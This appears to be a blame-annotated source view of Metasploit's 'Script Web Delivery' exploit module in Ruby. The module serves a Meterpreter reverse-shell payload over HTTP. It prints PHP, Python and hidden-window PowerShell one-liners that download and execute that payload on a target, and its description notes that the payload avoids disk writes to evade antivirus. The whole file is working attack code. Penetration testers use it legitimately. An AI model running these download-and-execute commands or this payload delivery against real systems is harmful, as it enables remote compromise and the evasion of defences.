metasploit-framework/modules/exploits/multi/script/web_delivery.rb

102 lines
3.9 KiB
Ruby
Raw Normal View History

2014-06-03 15:53:32 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-06-03 15:53:32 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
2014-06-03 15:53:32 +00:00
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
2014-06-03 15:53:32 +00:00
include Msf::Exploit::Powershell
2014-06-03 15:53:32 +00:00
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
2014-07-15 21:00:28 +00:00
'Name' => 'Script Web Delivery',
'Description' => %q(
2014-06-03 15:53:32 +00:00
This module quickly fires up a web server that serves a payload.
2014-07-01 20:52:18 +00:00
The provided command will start the specified scripting language interpreter and then download and execute the
2014-06-03 15:53:32 +00:00
payload. The main purpose of this module is to quickly establish a session on a target
machine when the attacker has to manually type in the command himself, e.g. Command Injection,
RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
2014-07-15 21:00:28 +00:00
write to disk so it is less likely to trigger AV solutions and will allow privilege
escalations supplied by Meterpreter. When using either of the PSH targets, ensure the
payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute
x86 payloads on x64 machines.
),
2014-07-15 21:00:28 +00:00
'License' => MSF_LICENSE,
'Author' =>
2014-06-03 15:53:32 +00:00
[
'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
'Ben Campbell',
'Chris Campbell' # @obscuresec - Inspiration n.b. no relation!
2014-06-03 15:53:32 +00:00
],
'DefaultOptions' =>
{
2014-07-15 21:00:28 +00:00
'Payload' => 'python/meterpreter/reverse_tcp'
},
2014-07-15 21:00:28 +00:00
'References' =>
2014-06-03 15:53:32 +00:00
[
['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
2014-06-03 15:53:32 +00:00
],
'Platform' => %w(python php win),
2014-06-03 15:53:32 +00:00
'Targets' =>
2014-06-03 18:21:13 +00:00
[
['Python', {
2014-06-26 02:01:19 +00:00
'Platform' => 'python',
2014-06-12 01:50:16 +00:00
'Arch' => ARCH_PYTHON
}],
['PHP', {
2014-06-12 01:50:16 +00:00
'Platform' => 'php',
'Arch' => ARCH_PHP
}],
2014-07-31 21:58:43 +00:00
['PSH', {
2014-06-12 01:50:16 +00:00
'Platform' => 'win',
2014-07-31 21:58:43 +00:00
'Arch' => [ARCH_X86, ARCH_X86_64]
}]
2014-06-03 18:21:13 +00:00
],
2014-06-03 15:53:32 +00:00
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 19 2013'
2014-07-15 21:00:28 +00:00
))
end
2014-06-03 15:53:32 +00:00
def on_request_uri(cli, _request)
print_status('Delivering Payload')
if target.name.include? 'PSH'
2014-07-31 21:58:43 +00:00
data = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
remove_comspec: true,
use_single_quotes: true
)
2014-06-03 15:53:32 +00:00
else
data = %Q(#{payload.encoded} )
2014-06-03 15:53:32 +00:00
end
send_response(cli, data, 'Content-Type' => 'application/octet-stream')
2014-06-03 15:53:32 +00:00
end
def primer
url = get_uri
print_status('Run the following command on the target machine:')
2014-07-15 21:00:28 +00:00
case target.name
when 'PHP'
print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
when 'Python'
print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
2014-07-31 21:58:43 +00:00
when 'PSH'
2015-04-20 10:00:26 +00:00
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
2015-09-23 19:45:51 +00:00
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
download_and_run = "#{ignore_cert}#{download_string}"
print_line generate_psh_command_line(
noprofile: true,
windowstyle: 'hidden',
command: download_and_run
)
2014-06-03 15:53:32 +00:00
end
2014-06-03 18:21:13 +00:00
end
2014-07-15 21:00:28 +00:00
end